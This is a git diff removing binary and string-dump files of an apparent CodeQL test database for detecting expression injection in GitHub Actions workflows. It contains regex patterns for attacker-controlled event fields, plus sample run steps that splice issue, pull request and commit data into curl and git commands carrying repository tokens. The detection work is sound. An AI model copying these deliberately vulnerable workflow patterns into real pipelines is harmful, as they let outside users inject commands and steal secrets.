z!bL=VW*bkqIuVwFr6wM1nhw)^OHgTeZ{fSE2U9*X!p-I^hH2mSuPW)>3DcgrV)$?#JeO3Zp8UfwpG8jv`EXE-&tUt_jn3^@MEF=CN&R4x8pIW!s1< zJb&&AQ_ZdI^&_{y{O}dk%=Dcw<#udw$J=8t<+fnRKmR<;3-^4O#>Bz2){-`v^2ux) zp3{c%`7nL=O^dAeLpH8A=&9cdQ$4i{LVt9_R1<|N=3zff{dD#Wr4O;b&VNlr06!#X ztO5L8o-j;#UNbl`MGmID+N3xrr3BL%Z2q)DSR1DNIr0*f`Y^3^+0I+_3t{>#A#E6I zw-Khg$=TK)ItEieJ8JqoBH(}T=)gY?(JG9OIiElDNOmiYum8u9Zc)kHSV(4AZu&?!F~>Yn9!uq*67s=cEK4ucbl45u%cjlV;Hzw>4UG{fnzsFu#RqjRty;SY-OP6P0MSo~z7 z%GSB~vjMo_MUlqxc_a7F265fCJ#Z%CnQc)qYV&bc;Eg(bSCimKxV*jUl94(7>>rM* zt+{y?-UbJK%*T za1>q$SFCz{{UMCuaGxJ@6Gw0gERZUaYXrN)8KoBDv9KmAY{YT72V=`I+rll9cq~VL 
z8wb^!hRuO>5nt%3QoIA608d%5_eTUg6?R!2eX(b5?K)4bjpobSE>)4U`d{pGK-@xy)Y z-MOsq@Evg~hbd>ya$Tirn8y7ctHxIc)3{U8i{qZcl(U}Px574<>QH$^^X3Pb=D5;m zrR5MCUo-PZrjXT0o3^K&nldo;b2IPCtnsiAJkg*uSq-NApJ$evYQdC)z@m=x1~AoO z*^cm)vtc@$iTRzq)-av5J>Mf;*0Awe-dVj{;31-KR9R)AXpZUwj%;8uWJ0d57j72sBYTLEqbxE0`5;Qwa@{ttM} Bc#Z%7 diff --git a/db/db-yaml/default/strings/0/pageDump/page-000000000 b/db/db-yaml/default/strings/0/pageDump/page-000000000 deleted file mode 100644 index eec9231ab076..000000000000 --- a/db/db-yaml/default/strings/0/pageDump/page-000000000 +++ /dev/null 
@@ -1,2 +0,0 @@ -tag:yaml.org,2002:(.*)mapstrboolseqintworkflow_call\$\{\{\s*[A-Za-z0-9_\[\]\*\(\)\.\-]+\s*\}\}octo-org/source-repo/.github/workflows/workflow.yml*output.workflow-outputFooahmadnassri/action-changed-filesoutput.filesPR changed filesoutput.jsondorny/paths-filteroutput.changesfranzdiebold/github-env-vars-actionoutput.CI_PR_DESCRIPTIONPR bodyoutput.CI_PR_TITLEPR titlejitterbit/get-changed-filesoutput.alloutput.addedoutput.modifiedoutput.removedoutput.renamedoutput.added_modifiedoutput.deletedkhan/pull-request-comment-triggeroutput.comment_bodypull_request_commenttj-actions/branch-namesoutput.current_branchPR current branchoutput.head_ref_branchPR head branchoutput.ref_branchBranch tirggering workflow runtj-actions/changed-filesoutput.added_filesoutput.copied_filesoutput.deleted_filesoutput.modified_filesoutput.renamed_filesoutput.all_old_new_renamed_filesoutput.type_changed_files${{ steps.changed-files.outputs.all_changed_files }}${{ secrets.DYNAMOBOTTOKEN }}${{ github.event.issue.url }}${{ github.actor }}${{ env.template }}${{ env.acceptable_missing_info }}${{ secrets.GITHUB_TOKEN }}${{env.comment_intro}}${{env.close_issue_comment}}${{env.info_needed}}${{env.issue_label}}${{env.needs_more_info_comment}}${{env.specific_info}}${{env.analysis_response}}${{env.greetings_comment}}${{ env.issue_json_string }}${{ github.repository }}${{github.event.after}}${{ env.ISSUE_BODY_PARSED }}${{env.user_name}}${{env.auto_branch}}${{env.destination_branch}}${{env.pr_message}}${{ github.event.discussion.title }}${{ github.event.discussion.body }}${{ github.event.pages[1].title }}${{ github.event.pages[11].title }}${{ github.event.pages[0].page_name }}${{ github.event.pages[2222].page_name }}${{ toJSON(github.event.pages.*.title) }}${{ steps.trim-url.outputs.trimmed_url }}${{needs.job1.outputs.job_output}}${{ env.global_env }}${{ env.test }}${{ env.job_env }}${{ env.step_env }}\$\{\{\s*([A-Za-z0-9_\[\]\*\((\)\.\-]+)\s*\}\}${{ matrix.language 
}}${{steps.no-step.outputs.foo}}github.event.comment.bodyinputs.who-to-greet${{ github.event.pull_request.title }}${{ github.event.pull_request.body }}${{ github.event.pull_request.head.label }}${{ github.event.pull_request.head.repo.default_branch }}${{ github.event.pull_request.head.repo.description }}${{ github.event.pull_request.head.repo.homepage }}${{ github.event.pull_request.head.ref }}${{ github.event.review.body }}output.unmerged_filesoutput.unknown_filesoutput.all_changed_and_modified_filesoutput.all_changed_filesoutput.other_changed_filesoutput.all_modified_filesoutput.other_modified_filesoutput.other_deleted_filesoutput.modified_keysoutput.changed_keystj-actions/verify-changed-filesoutput.changed-filestzkhan/pr-update-actionoutput.headMatchxt0rted/slash-command-actionoutput.command-arguments${{ github.head_ref }}${{ github.event.commits[11].message }}${{ github.event.commits[11].author.email }}${{ github.event.commits[11].author.name }}${{ github.event.head_commit.author.email }}${{ github.event.head_commit.author.name }}${{ github.event.head_commit.committer.email }}${{ github.event.head_commit.committer.name }}${{ github.event.commits[11].committer.email }}${{ github.event.commits[11].committer.name }}${{steps.summary.outputs.value}}${{steps.summary.outputs.foo}}${{ steps.source.outputs.all_changed_files_count }}${{ github.event.workflow_run.display_title }}${{ github.event.workflow_run.head_commit.message }}${{ github.event.workflow_run.head_commit.author.email }}${{ github.event.workflow_run.head_commit.author.name }}${{ github.event.workflow_run.head_commit.committer.email }}${{ github.event.workflow_run.head_commit.committer.name }}${{ github.event.workflow_run.head_branch }}${{ github.event.workflow_run.head_repository.description 
}}github.event.issue.titleenv.ISSUE_TITLEsteps.remove_quotations.outputs.replacedsteps.changed-files.outputs.all_changed_filesgithub.event.issue.bodyenv.content_analysis_responsesecrets.DYNAMOBOTTOKENgithub.event.issue.urlgithub.actorenv.ISSUE_BODYenv.templateenv.acceptable_missing_infosecrets.GITHUB_TOKENenv.comment_introenv.close_issue_commentenv.info_neededenv.issue_labelenv.needs_more_info_commentenv.specific_infoenv.analysis_responseenv.greetings_commentsteps.remove_quotes.outputs.replacedgithub.event.issue.numberenv.issue_json_stringsecrets.DYNAMO_ISSUES_TOKENgithub.repositorygithub.event.aftergithub.event.commits[0].messageenv.ISSUE_BODY_PARSEDenv.user_nameenv.auto_branchenv.destination_branchenv.pr_messagegithub.event.discussion.titlegithub.event.discussion.bodygithub.event.pages[1].titlegithub.event.pages[11].titlegithub.event.pages[0].page_namegithub.event.pages[2222].page_nametoJSON(github.event.pages.*.title)steps.extract-url.outputs.initial_urlsteps.curl.outputs.redirected_urlsteps.trim-url.outputs.trimmed_urlsteps.step.outputs.valuesteps.source.outputs.all_changed_filesalways()needs.job1.outputs.job_outputenv.global_envenv.testenv.job_envenv.step_envsteps.set-matrix.outputs.all_changed_filesfromJSON(needs.create-matrix.outputs.matrix)matrix.languagegithub.event.head_commit.messagesteps.no-step.outputs.foogithub.event.pull_request.titlegithub.event.pull_request.bodygithub.event.pull_request.head.labelgithub.event.pull_request.head.repo.default_branchgithub.event.pull_request.head.repo.descriptiongithub.event.pull_request.head.repo.homepagegithub.event.pull_request.head.refgithub.event.review.bodygithub.head_refgithub.event.commits[11].messagegithub.event.commits[11].author.emailgithub.event.commits[11].author.namegithub.event.head_commit.author.emailgithub.event.head_commit.author.namegithub.event.head_commit.committer.emailgithub.event.head_commit.committer.namegithub.event.commits[11].committer.emailgithub.event.commits[11].committer.namesteps.summary
.outputs.valuesteps.summary.outputs.foosteps.source.outputs.all_changed_files_countsteps.step2.outputs.teststeps.step0.outputs.valuesteps.step1.outputs.MSGgithub.event.workflow_run.display_titlegithub.event.workflow_run.head_commit.messagegithub.event.workflow_run.head_commit.author.emailgithub.event.workflow_run.head_commit.author.namegithub.event.workflow_run.head_commit.committer.emailgithub.event.workflow_run.head_commit.committer.namegithub.event.workflow_run.head_branchgithub.event.workflow_run.head_repository.descriptionmerge.*/(([^/]*?)(?:\.([^.]*))?)argus_case_study.ymlargus_case_studyymlchanged-files.ymlcomment_issue.ymlcomment_issuecomment_issue_newline.ymlcomment_issue_newlinecross1.ymlcross1cross2.ymlcross2cross3.ymlcross3discussion.ymldiscussion_comment.ymlgollum.ymlimage_link_generator.ymlimage_link_generatorinter-job.ymlinter-jobissues.yamlyamlmatrix.ymlno-flow1.ymlno-flow1no-flow2.ymlno-flow2pull_request_review.ymlpull_request_review_comment.ymlpull_request_target.ymlpush.ymlsimple1.ymlsimple2.ymlsimple2test.ymlworkflow_run.ymlaction.ymlaction([^/]+)/([^/@]+)@(.+)v2frabertreplace-string-action1.2v4tj-actionsv40github-scriptv3actions-ecosystemaction-regex-matchv2.5setup-dotnetv1.2mad9000actions-find-and-replace-string3([^/]+)/([^/]+)/([^@]+)@(.+)actions/checkoutfrabert/replace-string-actionactions/github-scriptactions-ecosystem/action-regex-matchactions/setup-dotnetmad9000/actions-find-and-replace-string\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*author\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*author\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*committer\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*committer\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*message\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*author\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*author\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*commi
tter\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*committer\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*message\b\bgithub\s*\.\s*head_ref\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*body\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*title\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*ref\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*label\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*repo\s*\.\s*homepage\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*repo\s*\.\s*description\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*repo\s*\.\s*default_branch\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_branch\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*display_title\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*message\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_repository\b\s*\.\s*description\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*author\b\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*author\b\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*committer\b\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*committer\b\s*\.\s*email\bexit name: Issue Workflowexit name: CIexit on: issue_commentexit name: I ... edicterexit name: Cherry pickingexit on: discussionexit on: dis ... commentexit on: gollumexit name: I ... cessingexit on: pushexit on: issuesexit name: " ... nguage"exit on: pul ... _reviewexit on: pul ... commentexit on: pul ... _targetexit on:exit name: 'test'exit name: 'Hello World'enter name: Issue Workflowenter name: CIenter on: issue_commententer name: I ... edicterenter name: Cherry pickingenter on: discussionenter on: dis ... commententer on: gollumenter name: I ... cessingenter on: pushenter on: issuesenter name: " ... nguage"enter on: pul ... 
_reviewenter on: pul ... commententer on: pul ... _targetenter on:enter name: 'test'enter name: 'Hello World'exit name: Issue Workflow (normal)exit name: CI (normal)exit on: issue_comment (normal)exit name: I ... edicter (normal)exit name: Cherry picking (normal)exit on: discussion (normal)exit on: dis ... comment (normal)exit on: gollum (normal)exit name: I ... cessing (normal)exit on: push (normal)exit on: issues (normal)exit name: " ... nguage" (normal)exit on: pul ... _review (normal)exit on: pul ... comment (normal)exit on: pul ... _target (normal)exit on: (normal)exit name: 'test' (normal)exit name: 'Hello World' (normal)input testocto-org/sink-repo/.github/workflows/workflow.ymlinput.config-pathexpression-injectionconfig-path.github/workflows/argus_case_study.yml.github/workflows.github.github/workflows/changed-files.yml.github/workflows/comment_issue.yml.github/workflows/comment_issue_newline.yml.github/workflows/cross1.yml.github/workflows/cross2.yml.github/workflows/cross3.yml.github/workflows/discussion.yml.github/workflows/discussion_comment.yml.github/workflows/gollum.yml.github/workflows/image_link_generator.yml.github/workflows/inter-job.yml.github/workflows/issues.yaml.github/workflows/matrix.yml.github/workflows/no-flow1.yml.github/workflows/no-flow2.yml.github/workflows/pull_request_review.yml.github/workflows/pull_request_review_comment.yml.github/workflows/pull_request_target.yml.github/workflows/push.yml.github/workflows/simple1.yml.github/workflows/simple2.yml.github/workflows/test.yml.github/workflows/workflow_run.ymlaction1/action.ymlaction1action2/action.ymlaction2action.yaml\bsteps\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\btoJSON\(steps\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)fromJSON\(steps\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)\binputs\.([A-Za-z0-9_-]+)\b\bneeds\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\btoJSON\(needs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)fromJSON\(needs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9
_-]+)\)toJSON\(inputs\.([A-Za-z0-9_-]+)\)fromJSON\(inputs\.([A-Za-z0-9_-]+)\)\bgithub\.event\.inputs\.([A-Za-z0-9_-]+)\btoJSON\(github\.event\.inputs\.([A-Za-z0-9_-]+)\)fromJSON\(github\.event\.inputs\.([A-Za-z0-9_-]+)\)\bjobs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\btoJSON\(jobs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)fromJSON\(jobs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)\bmatrix\.([A-Za-z0-9_-]+)\btoJSON\(matrix\.([A-Za-z0-9_-]+)\)fromJSON\(matrix\.([A-Za-z0-9_-]+)\)\benv\.([A-Za-z0-9_-]+)\btoJSON\(env\.([A-Za-z0-9_-]+)\)fromJSON\(env\.([A-Za-z0-9_-]+)\)Job: redirectIssueJob: changed_filesJob: echo-chamberJob: echo-chamber2Job: echo-chamber3Job: checkIssueInformationJob: issue_type_PredicterJob: cherry_pickJob: process-image-urlJob: job1Job: job2Job: create-matrixJob: analyzeJob: simple1Job outputs nodeUses StepRun StepRun Step: check-infoRun Step: extract-urlRun Step: curlRun Step: trim-urlRun Step: sinkRun Step: no-stepRun Step: flowRun Step: no-flowRun Step: step1Run Step: step2Uses Step: remove_quotationsUses Step: changed-filesUses Step: regex-matchUses Step: remove_quotesUses Step: sourceUses Step: stepUses Step: set-matrixUses Step: summaryUses Step: 
step0octo-org/this-repo/.github/workflows/workflow.ymltaintocto-org/summary-repo/.github/workflows/workflow.ymlakhileshns/heroku-deployinput.branchoutput.statusandroid-actions/setup-androidinput.cmdline-tools-versionoutput.ANDROID_COMMANDLINE_TOOLS_VERSIONapple-actions/import-codesign-certsinput.keychain-passwordoutput.keychain-passwordashley-taylor/read-json-property-actioninput.jsonoutput.valueashley-taylor/regex-property-actioninput.replacementinput.valueaszc/change-string-case-actioninput.stringoutput.capitalizedinput.replace-withoutput.uppercaseoutput.lowercaseaws-actions/configure-aws-credentialsinput.aws-access-key-idenv.AWS_ACCESS_KEY_IDsecret.AWS_ACCESS_KEY_IDinput.aws-secret-access-keyenv.AWS_SECRET_ACCESS_KEYsecret.AWS_SECRET_ACCESS_KEYinput.aws-session-tokenenv.AWS_SESSION_TOKENsecret.AWS_SESSION_TOKENbobheadxi/deploymentsinput.envoutput.envbufbuild/buf-breaking-actioninput.buf_tokenenv.BUF_TOKENbufbuild/buf-lint-actioncachix/cachix-actioninput.signingKeyenv.CACHIX_SIGNING_KEYcoursier/cache-actioninput.pathenv.COURSIER_CACHEcrazy-max/ghaction-import-gpginput.fingerprintoutput.fingerprintcsexton/release-asset-actioninput.release-urloutput.urldelaguardo/setup-clojureinput.bootenv.BOOT_VERSIONoutput.replacedgame-ci/unity-test-runnerinput.artifactsPathoutput.artifactsPathgetsentry/action-releaseinput.versionoutput.versioninput.version_prefixgithub/codeql-actioninput.outputoutput.sarif-outputgradle/gradle-build-actioninput.cache-encryption-keyenv.GRADLE_ENCRYPTION_KEYinput.build-scan-terms-of-service-agreeenv.BUILD_SCAN_TERMS_OF_SERVICE_AGREEinput.build-scan-terms-of-service-urlenv.BUILD_SCAN_TERMS_OF_SERVICE_URLhaya14busa/action-condinput.if_trueinput.if_falsehexlet/project-actioninput.mount-pathenv.PWDjsdaniell/create-jsoninput.nameoutput.successfullyinput.dirjwalton/gh-ecr-pushinput.imageoutput.imageUrllarsoner/circleci-artifacts-redirector-actioninput.artifact-pathinput.sourceinput.replacemattdavis0351/actionsinput.image-nameinput.tagmetro-digital/setup-t
ools-for-waasinput.gcp_sa_keyenv.GCLOUD_PROJECTmishakav/pytest-coverage-commentinput.multiple-filesoutput.summaryReportmymindstorm/setup-emsdkinput.actions-cache-folderenv.EMSDKruby/setup-rubyinput.ruby-versionoutput.ruby-prefixsalsify/action-detect-and-tag-new-versioninput.tag-templateoutput.tagshallwefootball/upload-s3-actioninput.destination_diroutput.object_keyshogo82148/actions-setup-perlinput.working-directoryenv.PERL5LIBsuisei-cn/actions-download-fileinput.filenameoutput.filenametimheuer/base64-to-fileinput.fileNameoutput.filePathinput.fileDirbranchcmdline-tools-versionkeychain-passwordjsonreplacementaws-access-key-idaws-secret-access-keyaws-session-tokenbuf_tokensigningKeyfingerprintrelease-urlbootartifactsPathversionversion_prefixoutputcache-encryption-keybuild-scan-terms-of-service-agreebuild-scan-terms-of-service-urlif_trueif_falsemount-pathdirartifact-pathimage-nametaggcp_sa_keymultiple-filesactions-cache-folderruby-versiontag-templatedestination_dirworking-directoryfilenamefileNamefileDir -echo "Bad Issue Title Format"exit 1echo "content_analysis_response=$(pwsh .\\.github\\scripts\\title_analyzer.ps1)" >> $GITHUB_ENVcurl -v -u admin:${{ secrets.DYNAMOBOTTOKEN }} -d '{"labels": ["${{env.content_analysis_response}}"]}' ${{ github.event.issue.url }}/labelsecho "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}" )" >> $GITHUB_ENVcurl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.close_issue_comment}} ${{env.info_needed}}"}' ${{ github.event.issue.url }}/commentscurl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X PATCH -d '{"state": "closed"}' ${{ github.event.issue.url }}curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"labels": ["${{env.issue_label}}"]}' ${{ github.event.issue.url }}/labelscurl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.needs_more_info_comment}} ${{env.specific_info}} 
${{env.analysis_response}}.\n\n${{env.info_needed}}"}' ${{ github.event.issue.url }}/commentsecho urldecode ${{env.issue_label}}curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X DELETE ${{ github.event.issue.url }}/labels/$(echo -ne "${{env.issue_label}}" | xxd -plain | tr -d '\n' | sed 's/\(..\)/%\1/g')curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.greetings_comment}}"}' ${{ github.event.issue.url }}/commentsecho "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}")" >> $GITHUB_ENVecho "parsed_issue_body="$(pwsh .\\.github\\scripts\\issue_body_cleaner.ps1 )"" >> $GITHUB_ENVecho "issue_json_string="$(pwsh .\\.github\\scripts\\get_issue_json_body.ps1 "$ISSUE_NUMBER")"" >> $GITHUB_ENVgh issue edit ${{ github.event.issue.number }} --add-label "Wishlist" --repo ${{ github.repository }}gh issue edit ${{ github.event.issue.number }} --add-label "NotMLEvaluated" --repo ${{ github.repository }}echo "destination_branch=$(pwsh .\\.github\\scripts\\cherry_pick_check.ps1 "${{ env.ISSUE_BODY_PARSED }}" )" >> $GITHUB_ENVgit config user.name "${{env.user_name}}"git fetch --allgit checkout -b ${{env.auto_branch}} origin/${{env.destination_branch}}git cherry-pick -x ${{github.event.after}} --strategy-option theirsgit push -u origin ${{env.auto_branch}}hub pull-request -b "${{env.destination_branch}}" -h "${{env.auto_branch}}" -m "${{env.pr_message}}"echo "::set-output name=initial_url::$BODY"echo "redirected_url=$(echo $INITIAL_URL)" >> $GITHUB_OUTPUTecho "trimmed_url=$(echo $REDIRECTED_URL)" >> "$GITHUB_OUTPUT"Write-Output "::set-output 
name=MSG::$ENV{BODY}".*::set-output\s+name=(.*)::.*.*echo\s*"(.*)=.*\s*>>\s*(")?\$GITHUB_OUTPUT.*$BODY$MSG$INITIAL_URL$REDIRECTED_URL${BODY${MSG${INITIAL_URL${REDIRECTED_URL$ENV{BODY$ENV{MSG$ENV{INITIAL_URL$ENV{REDIRECTED_URLoutput.foooutput.all_changed_files_countjob_output]test]matrix]MSG]value]replaced]initial_url]redirected_url]trimmed_url][job_output][matrix][MSG][value][replaced][initial_url][redirected_url][trimmed_url] [job_output] [test] [matrix] [MSG] [value] [replaced] [initial_url] [redirected_url] [trimmed_url]Uses Step: remove_quotations [replaced]Run Step: extract-url [initial_url]Run Step: curl [redirected_url]Run Step: trim-url [trimmed_url]Job outputs node [job_output]Uses Step: step [value]Job outputs node [matrix]Uses Step: summary [value]Uses Step: step0 [value]Run Step: step1 [MSG]Run Step: step2 [test]semmle.labelPotential expression injection, which may be controlled by an external user. \ No newline at end of file 
diff --git a/db/db-yaml/default/yaml.rel b/db/db-yaml/default/yaml.rel deleted file mode 100644 index 68a7a887f651d38ec0cd273155e841acc2d28904..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 33384 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 